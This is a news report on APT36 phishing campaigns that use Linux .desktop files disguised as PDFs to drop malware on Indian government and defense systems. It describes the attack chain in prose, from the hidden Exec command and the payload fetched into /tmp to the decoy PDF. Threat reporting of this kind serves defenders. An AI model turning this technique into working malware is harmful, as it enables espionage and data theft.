The Pakistani APT36 cyberspies are using Linux .desktop files to load malware in new attacks against government and defense entities in India.
The activity, documented in reports by CYFIRMA and CloudSEK, aims at data exfiltration and persistent espionage access. APT 36 has previously used .desktop files to load malware in targeted espionage operations in South Asia.
The attacks were first spotted on August 1, 2025, and based on the latest evidence, are still ongoing.
Desktop file abuse
Although the attacks described in the two reports use different infrastructure and samples (based on hashes), the techniques, tactics and procedures (TTPs), attack chains, and apparent goals are the same.
Victims receive ZIP archives through phishing emails containing a malicious .desktop file disguised as a PDF document, and named accordingly.
Linux .desktop files are text-based application launchers that contain configuration options dictating how the desktop environment should display and run an application.
Users open the .desktop file thinking it’s a PDF, which causes a bash command hidden in the ‘Exec=’ field to create a temporary filename in ‘/tmp/’ where it writes a hex-encoded payload fetched from the attacker’s server or Google Drive.
Then, it runs ‘chmod +x’ to make it executable and launches it in the background.
To lower suspicion for the victim, the script also launches Firefox to display a benign decoy PDF file hosted on Google Drive.